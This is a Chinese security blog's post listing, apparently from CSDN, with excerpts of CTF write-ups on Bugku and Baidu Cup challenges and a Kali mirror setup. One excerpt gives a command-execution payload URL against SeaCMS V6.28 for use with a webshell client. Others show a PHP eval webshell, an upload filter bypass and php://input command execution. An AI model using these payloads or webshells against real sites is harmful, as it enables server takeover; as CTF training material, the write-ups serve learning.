自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 2020年kali最新国内更新源sources.list

打开sources.list文件命令:leafpad /etc/apt/sources.list添加以下更新源:#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-f...

2019-05-10 12:28:43 61365 10

原创 ctf-wirteup-百度杯九月场-123

打开连接:发现一处登录,查看源代码:提示用户名密码相关信息,用户名都在user.php中查看备份文件,能否获取到user的备份文件:经尝试文件为:user.php.bak抓包进行爆破:爆破成功:账号为lixiuyun 密码为:lixiuyun1990登录成功:发现一个空页面查看源代码:本地创建html上传文件抓包:尝试后缀名绕过:pht成功绕过:又提示...

2019-10-11 16:41:06 281

原创 ctf-writeup-迎圣诞拿大奖-SQLi

打开连接,出现一个登录框:尝试:扫目录、弱口令、源代码都没有什么发现题目为sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。尝试手工测一下,发现在用户名处输入%时居然有报错!看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。sprintf注入,或者说php格式化字符串注入的原理为:要明白%后的一个字符(除了%,%...

2019-08-06 14:10:58 338

原创 payload-CMS-海洋CMS V6.28 命令执行

/search.php?searchtype=5&tid=&area=eval($_POST[cmd])直接菜刀连接,密码cmd

2019-08-01 16:16:53 1028

原创 ctf-wp-ssh私钥泄露

下载靶机之后进不去,这时候需要知道靶机的ip地址,kaili里面使用netdiscover工具,查找局域网内的主机。命令:netdiscover结果: Currently scanning: 172.16.96.0/16 | Screen View: Unique Hosts ...

2019-07-30 14:22:22 410

原创 wp-bugku-web6(速度要快)

打开连接看到没内容:burp抓包:看到一串base64加密的字符串:解密得到:“跑的还不错,给你flag吧: MzA0NjEx”go几次发现是会变的只能上脚本了:import requestsimport base64 url='http://123.206.87.240:8002/web6/'s=requests.Session()a=s.get('url').heade...

2019-03-15 16:57:52 1010

原创 wp-bugku-秋名山老司机

打开连接提示要两秒钟计算出一个变态的表达式先抓个包看看只能上脚本了import requestsimport re //这个库一般用来匹配文字url = 'http://123.206.87.240:8002/qiumingshan/' //urlr = requests.session() //requests.sesssion()对象可以跨请求的保存某些参数g = ...

2019-03-12 15:45:57 1352 1

原创 wp-bugku-flag在index.php中

打开连接查看源码发现:文件包含。使用php://filter读取index.php的源代码构造payload:index.php?file=php://filter/read=convent.base64-encode/resource=index.php得到index.php源代码的base64解密得到源代码:<html> <title>...

2019-03-11 15:19:06 478

原创 wp-bugku-变量1

打开url出现一段代码:flag In the variable ! <?php //提示flag在变量中error_reporting(0); //关闭错误显示include "flag1.php"; //包含flag1.phphighlight_file(__file__); //代码高亮if(isset($_GET['args'])){ //判断a...

2019-03-11 12:14:08 509

原创 wp-bugku-矛盾

打开连接得到几行代码要求num不是数字,并且num等于1.这道题考察php不会判断两边的表达式类型;(PHP 支持 >(大于),>=(大于等于),(等于),!=(不等于),<(小于),<= (小于等于)。PHP 还支持全等运算符 =(值和类型均相同)和非全等运算符 !(值或者类型不同)。)所以构造的num值1d(d可以是任意字符)...

2019-03-11 10:22:41 232

原创 WP-bugku-web3(窗口无法关闭问题)

打开url发现弹出窗口无法关闭:思路:考虑javascript脚本问题,先停用javascript试试:firefox里面关闭javascript方法:F12打开开发者工具–>设置–>Disable javascript,如图:此时发现弹窗消失,查看网页源码得到一串Unicode,解密后得到flag!...

2019-03-11 10:01:12 151

原创 cft-wp-百度杯CTF比赛 九月场(upload)

打开连接 发现有个上传功能:上传一句话试试:<?php @eval($_POST['pass']);?>发现没有路径,看下源码:找到路径,上菜刀提示连不上,猜测可能有过滤,或者文件不能被解析,先访问一下看看发现<?php 被过滤了。。翻阅资料找到一种php标记方法,将一句话改为:<script language=&amp

2018-09-30 14:59:58 974

原创 ctf-wp-百度杯CTF比赛 2017 二月场 include

考察文件包含打开题目:发现 allow_url_include on直接构造?path=php://inputpost参数<?php echo system('ls');?>列出文件名看看:发现有个奇怪的文件:dle345aae.php查看此文件内容:使用php://filter协议查看曝露出来的文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后...

2018-09-30 14:04:59 1186

原创 ctf-wp“百度杯”CTF比赛 十月场-LOGIN

进去题目看到一个登陆框,老规矩,看源码:看起来好像没什么有用的信息,突然发现可以下拉。。。找到test1,test1 (差点没发现T—T)登陆:出来了一个莫名其妙的东西。。上burp抓包看看:好像没有什么异常,但是仔细观察,发现返回中有个叫“show”的参数,值为零。尝试将参数show添加到请求,值改为1,看结果:源码来了。<head&am

2018-09-28 15:40:20 1057

原创 ctf-wp-第三届“百越杯”福建省高校网络空间安全大赛 Do you know upload?

考察:文件上传漏洞、数据库基本操作访问url :只能上传图片文件试着上传大马,burp抓包:尝试修改文件类型为:image/jpeg结果上传成功:访问大马:发现有个ctf.sql 。flag应该在数据库中,看看config.php,找到数据库连接方法:执行一下sql语句:看看都有那些表存在flag表,看看内容:bingo...

2018-09-28 14:17:16 1265

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除